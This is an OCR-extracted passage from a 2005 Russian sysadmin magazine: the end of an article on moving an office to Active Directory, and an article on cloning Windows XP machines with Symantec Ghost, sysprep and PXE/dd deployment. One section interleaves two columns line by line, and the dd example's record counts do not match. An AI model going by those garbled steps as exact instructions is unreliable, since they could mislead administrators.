Корпорация Microsoft\Outlook
Express\*.*.
! Адресная книга: %USERPRO-
FILE%\Application Data\Microsoft\
Address Book\*.wab.
10
! Избранное Internet Explorer:
% U S E R P R O F I L E% \ И з б р а н -
ное (про него часто забывают,
а у пользователя может быть
сохранено огромное количест-
во ссылок).
Не совсем рациональным хране-
нием данных почтового ящика от-
личается и популярная почтовая
программа The_BAT! – по умол-
чанию они хранятся в папке с са-
мой программой. Кстати, не забы-
вайте об использовании встроен-
ных мастеров экспорта и импор-
та данных, но не вздумайте слепо
им доверять – после экспорта дан-
ных всегда проверьте их импорт на
«чистую» систему.
! Все необходимые драйвера для пе-
реустановки ОС на серверах и ра-
бочих станциях. Крайне рекомен-
дуется иметь несколько «универ-
сальных» дисков с драйверами по-
пулярных материнских плат и уст-
ройств.
! Назначен день «X», в который ник-
то из пользователей не будет ра-
ботать. Оптимальны – два выход-
ных дня – за один можно не успеть.
При этом должен быть обеспечен
пропускной режим на предприятие
и доступ во все помещения с ком-
пьютерами.
Переход к Active Directory
Итак, назначенный день наступил и не-
обходимо начинать работы по созда-
нию домена. Еще раз убедитесь, что
все данные с перенастраиваемого сер-
вера сохранены в надежном месте.
Устанавливаем серверную опера-
ционную систему, обновления, про-
водим все первичные настройки. Со-
здаем и настраиваем домен (подроб-
но этот процесс многократно описан,
в том числе в [1]). После проверки ра-
ботоспособности домена вводим в не-
го рабочие станции пользователей.
Еще перед вводом в домен озаботь-
тесь их корректным именованием, при-
меняя только латиницу, без пробелов.
Русские имена не поддерживаются
Рисунок 2. Копирование информации из старого профиля в новый
DNS, а от его работоспособности за-
висит вся работа Active Directory. Реко-
мендуется сразу создать в домене пер-
вую учетную запись пользователя, ра-
бочую станцию которого мы будем вво-
дить в домен первой. После ввода про-
веряем минимальную корректность на-
строек – вход в домен после перезаг-
рузки должен осуществляться не доль-
ше 1 минуты. Если очень продолжи-
тельное время вы наблюдаете таблич-
ку «Применение параметров безопас-
ности» – какие-то из настроек некор-
ректны (чаще всего неправильно на-
строен DNS-сервер, либо не он пропи-
сан в свойствах сетевого подключения
клиента). Первый вход осуществляем
с учетными данными пользователя, ра-
ботающего за этой рабочей станцией.
В этот момент создается его профиль,
который будет соответствовать про-
филю данной системы по умолчанию.
Все предыдущие настройки останутся
в старом профиле пользователя. Если
имя для входа в домен не отличается от
предыдущего локального имени – но-
вый профиль будет создан с префик-
сом <имя домена>. Это сделано для
того, чтобы не повредить предыдущие
настройки. Сразу после первого входа
в систему завершаем сеанс пользова-
теля и входим уже с учетной записью
администратора домена для перене-
сения документов и настроек из ста-
рого профиля. Заходим в папку профи-
лей (на системах Windows 2000 и вы-
ше это папка Documents and Settings)
и копируем необходимые нам элемен-
ты в новый профиль (см. рис. 2). Обра-
тите внимание – не переносим, а имен-
но копируем, чтобы осталась возмож-
ность воспользоваться локальным вхо-
дом в систему со старыми учетными
данными. Таким образом, у вас будет
возможность войти в систему локаль-
но и посмотреть необходимые настрой-
ки. Например, для баз «1С:Предпри-
ятие 7.7», в большом количестве при-
сутствующих у сотрудников бухгалте-
рии, достаточно сохранить один раз-
дел реестра (HKEY_CURRENT_USER\
Software\1C\1Cv7\7.7\Titles) и затем вне-

сти информацию из него после входа
в домен. Полностью копировать содер-
жимое старого профиля не рекоменду-
ется без особых оснований, чтобы не
перетаскивать ненужный мусор – если
что-то понадобится – всегда можно бу-
дет потом достать.
Проверив работоспособность пер-
вой рабочей станции домена, можно
переходить к вводу в домен остальных,
повторяя описанную процедуру.
Несмотря на то, что при входе поль-
зователя в домен создается новый
профиль, а старый остается невреди-
мым – все равно крайне рекомендует-
ся создавать архивную копию указан-
ных данных в независимом месте. Ес-
ли же на рабочей станции производи-
лась переустановка ОС, то все пользо-
вательские данные необходимо будет
восстанавливать именно из упомяну-
того архива.
При переносе данных из одного
профиля в другой помните, что если
пользователь не будет являться ло-
кальным администратором компью-
тера, то может возникнуть необходи-
мость принудительного делегирования
ему необходимых разрешений NTFS.
Например, на папку почтового ящика
в программе The_Bat и пр. В против-
ном случае вы можете столкнуться с
ситуацией, когда пользователь будет
видеть документ (ярлык, папку и пр.),
а в доступе ему будет отказано. Это же
касается настроек и данных программ
– если какая-либо программа после
переноса настроек отказывается ра-
ботать, – прежде всего проверьте пра-
ва доступа нового пользователя к ра-
бочим папкам программы. В ситуаци-
ях, когда затруднительно понять, ку-
да же именно не хватает прав досту-
па и в этом ли заключается проблема,
можно на время делегировать пользо-
вателю права локального администра-
тора и заново произвести вход в систе-
му. Если проблема локализована и ос-
тается определить объекты доступа –
можно воспользоваться любым сис-
темным монитором от стороннего про-
изводителя, позволяющим вести жур-
нал обращения к объектам. Я исполь-
зую для этих целей программу Filemon
от Sysinternals. Она удобна тем, что
не требует инсталляции и показывает
не только файловую активность, но и
результаты обращения к реестру, а так-
же к Named Pipes. Акцентирую внима-
№9, сентябрь 2005
ние на том, что делегируются права ло-
кального администратора на конкрет-
ной локальной станции, а не права ад-
министратора домена! В грамотно на-
строенной сети даже если пользова-
телю оставить эти права для работы –
кроме настроек своего компьютера
он ничего испортить не сможет.
Начинаем работать
с доменом AD
Разумеется, что первое тестирование
работоспособности системы должны
проводить вы – еще до того, как поль-
зователи выйдут на свои рабочие мес-
та. При перенесении настроек из ста-
рых профилей в новые необходимо
на каждом рабочем месте сымитиро-
вать работу конкретного пользовате-
ля – открыть несколько документов,
проверить работоспособность почты,
баз данных и пр. Не поленитесь сде-
лать это, иначе в первый час работы
фирмы вам придется «разрываться
на части» между компьютерами, вос-
станавливая работоспособность конк-
ретных программ. Например, осущест-
вив первый вход в систему, обязатель-
но поочередно запустите программы
семейства Microsoft Office – при пер-
вом запуске с новым профилем поль-
зователя они произведут необходимые
настройки, возможно, потребовав дис-
трибутивные файлы. В противном слу-
чае пользователь, ткнув в любой до-
кумент Office, запустит этот процесс,
получив при этом сообщение о недо-
ступности файла. Практика показы-
вает, что это наиболее частое упуще-
ние. То же самое с путями и правами
к базам системы «1С:Предприятие» –
выше описан способ восстановления
таких настроек. Не забывайте также
про папки с общим доступом и прочие
сетевые ресурсы – их все необходимо
будет восстановить и проверить рабо-
тоспособность и права доступа. Также
часто пользователи для доступа к се-
тевым ресурсам используют быстрые
ссылки, автоматически создаваемые
в папке «Сетевое окружение».
В первый день ввода в эксплуата-
цию новой системы вы должны поя-
виться на предприятии раньше всех.
Если вы позволите себе опоздать, ре-
акция пользователей будет непред-
сказуемой – от недоумения до паники.
Главное – не позволяйте пользовате-
лям сеять эту панику среди коллекти-
администрирование
ва. ваши реплики при общении долж-
ны быть спокойными и уравновешен-
ными: «Не волнуйтесь, сейчас все на-
стройки восстановим. Мне понадобит-
ся ваша помощь» и т. д. Рекомендуется
повесить на входе объявление о «Пере-
ходе на новую систему» с просьбой по
всем вопросам обращаться к вам.
После перенастройки системы вы
услышите множество возгласов в сти-
ле: «Все мои документы пропали!».
Главное не паниковать – если все было
сделано грамотно и архивы созданы, –
восстановить связи недолго. Не стоит
метаться от одного пользователя к дру-
гому – по очереди подойдите к каждо-
му и попросите при вас проверить ра-
ботоспособность системы. Устраните
самые срочные проблемы и перейди-
те к следующему пользователю. Если
в процессе исследований какие-то на-
стройки или документы пользователей
были утрачены – немедленно просмот-
рите информацию, указанную пользо-
вателем в анкете компьютера. Если там
ничего не говорится об этих данных –
вы тоже не экстрасенс и догадываться
на астральном уровне не могли. Пояс-
ните это пользователю. Именно поэто-
му очень важно несколько раз предуп-
редить пользователей об ответствен-
ности при заполнении анкеты.
Практика показывает, что при адек-
ватной психологической реакции ад-
министратора (профессионализм, спо-
койствие и невозмутимость) такие про-
екты осуществляются ровно и по пла-
ну. Разумеется, что речь идет именно
о корректной реализации такого внед-
рения. Если перебои в работе предпри-
ятия или потеря данных была вызвана
ошибками системного администрато-
ра – стоит задуматься о повышении
квалификации и не браться за подоб-
ные проекты.
Автор статьи реализовал более 200
подобных и более сложных проектов
системной интеграции и частично опи-
сал свой личный опыт работы.
Литература:
1. Марков Р. Установка и настрой-
ка Windows 2К Server. – Журнал
«Системный администратор» №10,
2004 г. – 88-94 с.
2. Microsoft Windows 2000 Active
Directory Services. Учебный курс.
Издательство: Русская Редакция –
http://www.rusedit.ru.
11
 администрирование

SYMANTEC GHOST,
ИЛИ КАК СДЕЛАТЬ КЛОН СВОИМИ РУКАМИ

МИХАИЛ ПЛАТОВ
Вам наверняка приходилось сталкиваться с ситуацией, когда нужно было
установить несколько компьютеров с абсолютно одинаковым набором программ.
«Тупая механическая работа – думали вы, – почему нельзя просто взять и скопировать?».
Собственно, а кто сказал, что нельзя? Очень даже можно, и сегодня вы узнаете как!

Первое знакомство
Поддержка парка компьютеров боль-
шого предприятия – задача не из лег-
ких. Наиболее удручающая часть – ру-
тинная работа по обслуживанию ком-
пьютеров. Наиболее типичные задачи:
установка ОС, поддержка ее работос-
пособности, модернизация оборудова-
ния, миграция настроек пользователей
и т. д. Для решения этих проблем мож-
но использовать платформу Windows
Server System. Так, благодаря Active
Directory упрощается управление учет-
ными записями пользователей органи-
зации, а с помощью Remote Installation
Services (RIS) можно автоматизировать
процесс установки операционной сис-
темы. Однако возможности RIS небез-
граничны, поэтому и существуют про-
дукты партнеров Microsoft, к числу ко-
торых относится и Symantec. О продук-
те Symantec Ghost 8.0 Corporate Edition
и пойдет речь в этой статье.
Итак, что же может делать Symantec
Ghost? Полный ответ приводится на бо-
лее чем трехстах страницах сопрово-
дительного руководства [1]. Коротко
же можно сказать так: «Symantec Ghost
позволяет значительно облегчить уста-
новку и поддержку ОС и программно-
го обеспечения в организации». Крат-
ко перечислю его наиболее интерес-
ные функции:
! Массовое «клонирование» компью-
теров. Представьте, что вам необ-
ходимо установить операционную
систему, а также некий набор про-
грамм на 100 только что купленных
компьютеров. С помощью Symantec
Ghost можно изготовить так назы-
ваемый «эталонный образ», содер-
жащий все необходимые програм-
мы, а затем растиражировать его
на необходимое количество ком-
пьютеров (при этом предполагает-
ся, что вы располагаете необходи-
мыми лицензиями для эксплуата-
ции ПО на необходимом количес-
тве компьютеров).
! Резервное копирование. С помо-
щью Ghost можно делать резерв-
ные копии нескольких папок, раз-
делов и жестких дисков. Поддержи-
ваются как полные, так и инкремен-
тальные резервные копии.
! Восстановление компьютеров до
«известного» состояния. С помо-
щью планировщика заданий мож-
но по заданному расписанию пе-
риодически (например, раз в день)
восстанавливать ОС на компьюте-
рах до известного состояния. Дан-
ная схема особенно полезна для
интернет-салонов, учебных заве-
дений, а также других мест, в ко-
торых за компьютерами работает
большое количество слабо конт-
ролируемых пользователей. Кро-
ме того, при такой схеме для уста-

12

Рисунок 1. Структура Symantec Ghost
новки новой программы на все ком-
пьютеры достаточно просто один
раз обновить используемый мас-
тер-образ.
! Централизованное управление
компьютерами – с помощью кон-
соли можно выполнять на управ-
ляемых компьютерах любые коман-
ды и файлы, а также получать ин-
формацию от системных объектов
WMI. Так, по определенному при-
знаку (тип ОС, объем установлен-
ной памяти и другие параметры)
можно выделить группу компьюте-
ров и выполнить для них некоторую
команду (запуск файла установки
обновления ПО, специализирован-
ная утилита и т. д.).
! Миграция параметров пользовате-
лей – используя встроенные средс-
тва, можно перенести файлы и па-
раметры учетной записи пользо-
вателя при установке новой вер-
сии операционной системы.
! Централизованная установка ПО –
создавая специальные пакеты ус-
тановки (AI Packages), можно прос-
то и быстро устанавливать допол-
нительное ПО на компьютеры, уп-
равляемые Ghost-сервером.
! Поддержка популярных файло-
вых систем. Symantec Ghost может
на уровне файлов работать с фай-
ловыми системами FAT, FAT32,
NTFS и Linux Ext2/3.
! Возможность работы с различными
устройствами. Для хранения обра-
зов могут использоваться локаль-
ные жесткие диски, сетевые ресур-
сы, CD и DVD-приводы, устройства
USB 1.1/2.0 и FireWire (IEEE1394).
Д ля лучшего понимания при-
нципов работы, давайте посмотрим
на Symantec Ghost изнутри.
Как видно из рис. 1, Symantec Ghost
представляет собой типичное кли-
ент-серверное приложение. Сер-
верная часть представлена «Служ-
№9, сентябрь 2005
бой конфигурации» (Symantec Ghost
Configuration Service), СУБД Adaptive
Server Anywhere 7.0 и графической кон-
солью управления (Ghost Console).
В составе клиента условно можно
выделить два основных компонента:
! Ghost-раздел на жестком диске.
! Клиент Ghost-консоли, работаю-
щий как системная служба ОС.
Существует два типа Ghost-разде-
лов: реальный раздел на жестком дис-
ке (FAT12, 16 Мб) и так называемый
«виртуальный» раздел. Первый явля-
ется обычным загрузочным DOS-раз-
делом, с которого при необходимос-
ти запускается DOS-версия клиента
Ghost. (Например, при обновлении ОС
компьютера). В отличие от реального
раздела, виртуальный создается в не-
фрагментированном файле, на загру-
зочном системном диске. Если вы пла-
нируете периодически обновлять ОС,
то лучше создать выделенный раздел
для клиента, если же Ghost будет пре-
имущественно использоваться только
для выполнения команд, установки ПО,
получения информации и редкой пере-
установки ОС, то можно ограничиться
виртуальным разделом.
Работа в Ghost происходит по сле-
дующему сценарию:
! С помощью консоли администра-
тор назначает компьютеру зада-
ние (запись раздела жесткого дис-
ка, установка пакета ПО, копирова-
ние фалов, применение парамет-
ров компьютера, выполнение фай-
ла и т. д.).
! Сервер конфигурации подключа-
ется к клиенту и сообщает ему ко-
манду, которую необходимо выпол-
нить.
! В зависимости от типа команды
клиент либо выполняет ее непос-
редственно из Windows, либо загру-
жает DOS-версию клиента и выпол-
няет ее оттуда (например, в случае
записи раздела диска).
администрирование
FAQ
Можно ли с помощью Ghost клонировать
Linux, установленный на ext2/3 файло-
вую систему?
Можно, но в этом случае образ будет де-
латься посекторно, со всеми вытекающи-
ми отсюда последствиями (невозможность
изменения размера раздела при клониро-
вании, отсутствие возможности просмотра
и редактирования файлов в образе).
Можно ли с использованием Ghost кло-
нировать Windows 2000/2003 серверы?
Технически ghost способен сделать об-
раз раздела или диска сервера, который
в дальнейшем может использоваться как
резервная копия или как образ для мигра-
ции. Если же предполагается создание до-
полнительной копии существующего сер-
вера, например, для работы в качестве
резервного контроллера домена, то ghost
для этих целей лучше не использовать. Де-
ло в том, что многие серверные службы
при установке создают собственные уни-
кальные идентификаторы. При клонирова-
нии Ghost изменит только SID компьюте-
ра (с помощью Ghost Walker или sysprep).
Идентификаторы служб потеряют свою
уникальность, что в свою очередь может
привести к сбоям в их работе.
Как клонирование отражается на фай-
лах, зашифрованных с помощью EFS?
Если при клонировании вы изменяете SID
(с помощью sysprep, Ghost Walker или дру-
гого средства), то зашифрованные файлы
прочитать будет невозможно. Если же де-
лаете копию диска в целях резервирова-
ния, то SID не изменится и зашифрованные
файлы будут читаться так же, как и на ри-
гинальном компьютере.
Можно ли с помощью Ghost клонировать
ОС, установленную на RAID-массиве?
Нет, работа с RAID-массивами не подде-
рживается.
Итак, думаю общее рассмотрение
на этом можно закончить и плавно пе-
рейти к практической части нашего ис-
следования.
Устанавливаем
Ghost-сервер
В качестве примера рассмотрим реше-
ние проблемы, которую мы рассмотре-
ли выше – установка 10 новых компью-
теров с возможностью их периодичес-
13
 администрирование
Меняем HAL
А зачем вообще может понадобиться сме-
на HAL? В нашем случае целью является
создание «универсального образа ОС», ра-
ботающего на компьютерах различной кон-
фигурации, хотя могут быть и другие при-
чины: например, вы купили новую материн-
скую плату с поддержкой HyperThreading,
а переустанавливать заново ОС и все про-
граммы особого желания нет.
Можно выделить два варианта заме-
ны HAL – смена «более продвинутого HAL»
(нижние строки таблицы 1) на более «ста-
рый» (верхние строки таблицы 1). В этом
случае подойдет стандартное средство –
диспетчер устройств. Найдем устройство
компьютер, в контекстном меню выберем
«Обновить драйвер» и в режиме ручной ус-
тановки выберем нужный HAL из списка.
К сожалению, для обратной замены
(более старого HAL на продвинутый), на-
чиная с Windows XP и выше, такой способ
не работает, и HAL придется менять вруч-
ную.
Для начала определитесь с типом HAL,
который вы хотите установить. Если вы
кого сброса до начального состояния.
Для усложнения задачи будем считать,
что компьютеры имеют различные ап-
паратные конфигурации.
Первое, что нам потребуется сде-
лать, – установить Ghost-сервер.
Для этого скачаем с сайта Symantec [2]
ознакомительную версию Symantec
Ghost 8.0 Trialware (90 Мб). Эта версия
обладает полной функциональнос-
тью, ограничением же является макси-
мальное число обслуживаемых клиен-
тов – 10, а также суммарное количес-
тво операций, которые можно выпол-
нить из консоли – 20. Процесс инстал-
ляции не должен вызвать каких-либо
затруднений – стандартные диалоги
мастера InstallShield. Установка с па-
раметрами по умолчанию (все компо-
ненты) нас вполне устроит.
Системные требования для сервера
более чем скромные – ОС Windows 2000
SP4 или выше с 96 Мб ОЗУ. После ус-
тановки сам Ghost занял 72 Мб на дис-
ке. Требования к клиентам еще смеш-
нее – процессор от 386. Поддержива-
емые клиентом ОС – от Windows 9x
до Windows XP, Linux (желательно
с файловой системой ext2 или ext3).
После установки буду т созда-
ны две системные службы: Symantec
14
планируете установить ACPI-ядро вместо
Standard PC, то, скорее всего, придется пе-
реустанавливать ОС, слишком сильны от-
личия в реестре. Если же нужно заменить
одно ACPI-совместимое ядро на другое,
то можно обойтись без переустановки.
Рассмотрим сказанное на примере. До-
пустим мы хотим обновить HAL для под-
держки HyperThreading. Из дистрибути-
ва Windows (или файла drivers.cab) возь-
мем файлы ntkrnl.exe и halmacpi.dll и ско-
пируем их в папку system32 инсталляции
Windows. Затем откроем файл boot.ini и
продублируем последнюю строчку, доба-
вив к ней параметры /kernel=ntkrnlmp.exe
/hal=halmacpi.dll.
Должно получиться нечто похожее
на это:
ulti(0)disk(0)rdisk(0)partition(1) ↵
WINDOWS="XP Professional MP" ↵
/noexecute=optin /fastdetect ↵
/kernel=ntkrnlmp.exe ↵
/hal=halmacpi.dll
Теперь перезагрузимся и проверим
новый HAL, открыв Task Manager. На ком-
пьютерах с поддержкой HT процессоров
будет два.
Ghost Database Service и Symantec
Ghost Win32 Configuration Server. Пер-
вая служба представляет собой СУБД
Adaptive Server Anywhere 7.0, которая
используется для хранения служеб-
ных данных, вторая – сервер конфигу-
рации Ghost, отвечающий за взаимо-
действие с Ghost-клиентами.
В программном меню будет созда-
ны ярлыки для запуска следующих
компонентов:
! Symantec Ghost Console – как сле-
дует из названия, это и есть основ-
ной компонент, с помощью кото-
рого осуществляется управление
зарегистрированными рабочими
станциями.
! GhostCast Server – с помощью это-
го приложения можно вручную ор-
ганизовывать передачи ghost-обра-
зов клиентам. Очень полезно при
первом подключении компьютеров
к консоли. При выполнении зада-
ний из консоли GhostCast Server
будет запускаться автоматически.
! Ghost Boot Wizard – с помощью
этой утилиты можно формировать
загрузочные носители (дискета,
компакт-диск, загрузочный раздел
жесткого диска), содержащие DOS-
клиента Ghost.
! AI Builder – инструмент создания па-
кетов установки ПО для их после-
дующего централизованного раз-
мещения через Ghost-консоль.
! Ghost Explorer – программа, позво-
ляющая просматривать и редакти-
ровать Ghost-образы.
На этом ненадолго оставим наш
сервер и перейдем к клиентскому ком-
поненту.
Изготавливаем клон
Первое, что нам понадобится сде-
лать, – создать эталонный образ, кото-
рый впоследствии и будет растиражи-
рован на все компьютеры. При этом мы
можем использовать как образ всего
жесткого диска (содержащий загруз-
чик и все разделы), так и образ одно-
го системного раздела ОС. Второй спо-
соб является более гибким и, возмож-
но, чуть более сложным. Именно его
мы и рассмотрим.
Итак, возьмем наиболее типичный
компьютер и приступим к установке.
Первым делом переразметим диск,
удалив с него все разделы. Для ОС
и сопутствующих программ созда-
дим 10 Гб primary-раздел. Оставшее-
ся место используем по собственно-
му усмотрению, например, для хране-
ния файлов. В установке ОС нет ни-
каких особенностей (здесь предпола-
гается, что используется корпоратив-
ная версия Windows XP SP2, не тре-
бующая повторной активации при из-
менении оборудования). Единствен-
ное, при использовании XP SP2 при-
шлось отключить режим «Простого об-
щего доступа к файлам» и активиро-
вать исключающее правило для служ-
бы «File and Printer Sharing» в парамет-
ры firewall. Разрешения для Ghost-кли-
ента в Windows Firewall добавились ав-
томатически.
Для централизованного управле-
ния установим на подопытную маши-
ну клиента Ghost-консоли. Для это-
го зайдем на сервер, запустим Ghost
Console и в меню Tools выберем пункт
Remote Client Install. В появившемся
списке выберем нужный компьютер
и нажмем кнопку «Add >>». Затем вве-
дем имя и пароль пользователя, име-
ющего доступ к машине, в нашем слу-
чае таким пользователем будет ло-
кальный администратор. После нажа-
тия кнопки «Install» сервер подключит-

ся к компьютеру и установит на него
Ghost-клиента.
Если же по каким-то причинам дис-
танционно установить клиента не уда-
лось, то можно провести установку
вручную. Дистрибутив клиента можно
взять либо на компакт-диске продукта,
либо в папке установки сервера. При
запуске необходимо указать имя ком-
пьютера с Ghost-сервером. Через не-
которое время после установки маши-
на появится в Ghost-консоли.
Подготавливаем образ
После завершения инсталляции про-
грамм перейдем к наиболее интерес-
ному моменту – подготовке системы
к тиражированию. При этом нам не-
обходимо будет решить две основные
проблемы:
! Добиться переносимости образа
между компьютерами с различным
оборудованием.
! Сделать так, чтобы ОС-клоны смог-
ли работать в одной сети.
Истоки первой проблемы скрыва-
ются в недрах архитектуры Windows NT,
а именно – в механизме работы ОС
с оборудованием. В Windows NT сущес-
твует так называемый HAL (Hardware
Abstraction Layer) – уровень абстрак-
ции от оборудования, скрывающий
от ядра ОС особенности работы с фи-
зическими устройствами. Ничего пло-
хого в самой идее HAL нет, скорее да-
же наоборот, просто его конкретная
реализация в ОС Windows вызывает
некоторые трудности применитель-
но к массовому тиражированию. Де-
ло в том, что в Windows существует
несколько различных HAL. Так есть
HAL PIC, APIC, MP и несколько версий
ACPI (cм. таблицу 1). Выбор в пользу
применения конкретного HAL дела-
Таблица 1. Возможные типы HAL, используемые Windows
№9, сентябрь 2005
ется на этапе установки ОС, в зави-
симости от типа имеющегося в ком-
пьютере оборудования. Так, для ком-
пьютеров на основе чипсета i440LX/
BX, скорее всего, будет выбран HAL
PIC или APIC, в то время как на бо-
лее новых материнских платах (боль-
шинство выпущенных после 1999 го-
да) при установке, скорее всего, будет
выбрана ACPI-версия HAL. Соответс-
твенно, если эталонная система изго-
тавливалась на компьютере с полной
поддержкой ACPI (в диспетчере уст-
ройств для компьютера написано ACPI
Uniprocessor PC), то растиражировать
образ можно будет только на такие же
100% ACPI-совместимые компьютеры.
С другой стороны, использовать HAL
Standard PC на современных компью-
терах тоже не совсем правильно.
Таким образом, выбор в пользу
конкретного HAL следует произво-
дить исходя из реального парка ком-
пьютеров. В нашем примере мы будем
использовать компромиссный вари-
ант HAL – Advanced Configuration and
Power Interface (ACPI) PC, поддержи-
вающий часть спецификаций ACPI.
В этом случае мы, с одной стороны,
получим большинство функций Power
Management, а с другой стороны, обес-
печим хорошую переносимость кло-
на. Гораздо проще поддерживать один
клон, чем по одному для каждой ли-
нейки, особенно если линеек таких
много.
Однако успех переноса определя-
ется не только текущим HAL, но и драй-
верами, используемыми в системе.
Так, наверняка многие из вас пробо-
вали переставлять жесткий диск с ус-
тановленной ОС в другой компьютер,
причем если в этом компьютере ис-
пользовался другой чипсет (более но-
вая версия или чипсет другого произ-
администрирование
Рисунок 2. Стандартные версии
драйверов
водителя) то ОС, как правило, старто-
вать отказывалась. Причина такого по-
ведения достаточно проста. ОС загру-
жается, попутно инициализируя извес-
тные ей устройства. Думаю, не нуж-
но быть пророком, чтобы догадаться,
что скажет IDE контроллер Intel, когда
с ним будут говорить на языке конт-
роллера VIA или AMD. Мы же при этом
обычно видим «синий экран» с над-
писью «Inaccessible boot device». Что-
бы этой ситуации избежать, посту-
пим следующим, неоднократно про-
веренным способом: перед перено-
сом системы с помощью диспетчера
устройств заменим драйверы контрол-
лера IDE и его каналов стандартными
версиями. Перезагружать компьютер
при этом не нужно (рис. 2).
Далее можно выключить компью-
тер, вытащить диск, переставить его
в другую машину, например, с другой
аппаратной конфигурацией, при необ-
ходимости установить недостающие
драйверы и убедиться, что все коррек-
тно работает. Повторив эту операцию
для каждого типа используемых ма-
шин, мы доставим в систему все не-
обходимые драйверы, тем самым из-
бавив себя от проблем с их установ-
кой после клонирования. На этом пер-
вую проблему (переносимость) мож-
но считать решенной и теперь перей-
дем ко второй.
Причины второй проблемы кроются
в механизмах работы ОС Windows NT
15
 администрирование
в рамках сети. В доменах и ра- по собственному усмотрению.
бочих группах компьютеры Сохраним файл под именем
идентифицируются по име- sysprep.inf (рис. 3).
ни и уникальному идентифи- Теперь вернемся к Ghost-
катору безопасности – SID консоли и создадим зада-
(Security Identifier), создавае- ние для получения образа.
мому на этапе установки ОС. Для этого откроем раздел
Таким образом, скопировав меню Tasks, щелкнем правой
диск «в лоб» мы получим вто- кнопки мыши в области спра-
рую копию операционной сис- ва и в появившемся меню вы-
темы, имеющую точно такие берем параметр «New Image
же SID компьютера и пользо- Create Task» (см. рис. 5).
вателей. С практической сто- В появившемся окне за-
Рисунок 3. Окно диалога Setup Manager
роны эта ситуация будет вы- дадим имя задания – Dump
глядеть следующим образом: Image, выберем диск, раздел
из всех наших клонов только и компьютер, с которого бу-
один сможет войти в рабочую дет делаться образ. Напро-
группу или домен. тив «Image Name» нажмем
Итак, как вы уже, навер- «Browse», и укажем имя фай-
ное, догадались, решением ла, которое будет использо-
второй проблемы является ваться для хранения образа
изменение имен и компью- (см. рис. 4).
теров и их идентификаторов На закладке «Network» вы-
безопасности (SID). Для этого берем режим «Unicast» и, ес-
можно использовать как ми- ли необходимо, зададим огра-
нимум 2 средства: ничение на максимально ис-
! Symantec Ghost Walker пользуемую пропускную спо-
! Microsoft Sysprep собность сети. Затем перей-
дем на закладку «Sysprep»,
Первое средство входит активируем параметр «Run
в состав корпоративной вер- Microsoft Sysprep on machine
сии Ghost и предназначе- before creating image» и созда-
но специально для измене- дим sysprep-конфигурацию
ния идентификаторов безо- с использованием файлов,
Рисунок 4. Диалог создания задания
пасности. распакованных из deploy.cab.
Второе, более полно именуемое «sysprep setup»), далее укажем тип ис- После запуска этого задания на маши-
как System Preparation Tool, выпускает- пользуемой нами ОС, а на последний не-эталоне загрузится DOS-клиент, ко-
ся корпорацией Microsoft для тиражи- вопрос мастера выберем ответ с пол- торый начнет передачу образа на сер-
рования и аудита ОС Windows 2000/XP ной автоматизацией установки («Yes, вер (см. рис. 6).
корпоративными клиентами, реселле- fully automate the installation»). В появив-
рами и дистрибьюторами. Ввиду боль- шемся окне мы можем ввести ответы Предстартовый отсчет
шей гибкости и универсальности для на вопросы, задаваемые при установ- Как только образ скопируется, можно
решения нашей задачи будем исполь- ке. Для успешного клонирования опре- будет перейти к заключительному эта-
зовать sysprep. Помимо самой утили- делим следующие значения полей: пу – массовой установке ОС на клиент-
ты нам понадобится сделать так назы- ! Time Zone – выберем GMT+3. ские компьютеры. А пока идет копи-
ваемый «файл ответов», в котором бу- ! Product Key – введем серийный но- рование, произведем небольшую на-
дут указаны параметры, которые бу- мер ОС. стройку рабочих станций. Как вы уже,
дут использоваться для автоматиза- ! Computer Name – выбрать вари- наверное, догадались, для передачи
ции установки. Утилиту sysprep возь- ант с автоматической генерацией образа на рабочие станции нам по-
мем с компакт-диска Windows XP из ар- имен. надобится предварительно запустить
хива deploy.cab, находящегося в пап- ! Networking Components – использо- на них Ghost-клиента. Сделать это
ке support\tools. Разархивировав со- вать DHCP. можно двумя способами.
держимое архива, на Ghost-сервер за- ! Workgroup or domain – необходимо
пустим файл setupmgr.exe. С его помо- оставить вариант с включением в
щью мы создадим файл ответов для рабочую группу.
sysprep. В первом диалоге укажем, ! Regional Settings, Languages – вы-
что мы хотим создать новый файл брать русский язык.
(пункт «create new»), во втором выбе-
рем файл ответов для sysprep (опция Остальные поля можно заполнить Рисунок 5. Создание задания

16

Рисунок 6. Передача образа в DOS-клиенте
Способ 1: загрузка DOS-версии
Ghost-клиента с помощью 2 загру-
зочных дискет. Создать дискеты мож-
но с помощью мастера «Ghost boot
Wizard». В этом случае нужно будет
вручную загрузить все необходимые
компьютеры, запустить GhostCast-
сервер и передать клиентам файл-об-
раз. Данный способ прост, и его впол-
не можно использовать, если машин
немного и регулярно клонировать их,
скорее всего, не придется.
Если же ситуация иная, то больше
подойдет способ 2: автоматизирован-
ная установка служебного Ghost-раз-
дела. В этом случае с использованием
механизмов сетевой загрузки на каж-
дом клиентском компьютере созда-
ется служебный загрузочный раздел,
на котором размещается DOS-версия
клиента.
В варианте «из коробки»
для сетевой загрузки Ghost
используется механизм 3Com
DynamicAccess boot. Ввиду то-
го, что эта технология подде-
рживается далеко не всеми
сетевыми платами, рассмот-
рим другой, более универ-
сальный способ.
Идея следующая – сете-
вая загрузка Linux-системы
с последующим копировани-
ем служебного раздела Ghost.
При этом необходимо выпол-
нить следующие шаги:
! Создать 2 загрузочные
дискеты с DOS-клиентом
Ghost. Дискеты создают-
ся с помощью мастера
«Ghost boot Wizard», вари-
ант «Network boot disk». Рисунок
№9, сентябрь 2005
Рисунок 7. Копирование конфигурации компьютеров
! Создать образ загрузочного раз-
дела Ghost, содержащий Ghost-
клиента и драйверы сетевых карт.
Для создания образа использует-
ся тот же самый мастер, вариант
«Console Boot Partition». Для до-
бавления драйверов нескольких
карт можно использовать пункт
«Multicard Template».
! При помощи стандартных средств
(GhostCast-сервер и дискеты) за-
писать полученный образ на один
из целевых компьютеров (но не
на тот, на котором мы сделали
клон) в режиме копирования дис-
ка.
! Через PXE загрузить Linux с кор-
невой файловой системой на NFS-
сервере.
! Скопировать загрузчик и первый
раздел диска на NFS-сервер. Сде-
8. Основные настройки задания Deploy Image
администрирование
лать это можно с помощью следу-
ющей команды:
# dd if=/dev/hda of=/home/hda ↵
count=32256 ibs=512
322256+0 records in
322556+0 records out
Через PXE загрузить все осталь-
ные компьютеры и записать на них
полученный образ. (Внимание!
При этом вся информация на пер-
вом жестком диске будет уничтоже-
на!) В самом простом случае доста-
точно модифицировать стартовые
скрипты дистрибутива так, чтобы
выполнялись команды dd и reboot.
После перезагрузки компьютеры
загрузят DOS-клиента Ghost и зарегис-
трируются в консоли. Теперь создадим
для них конфигурации (имя компью-
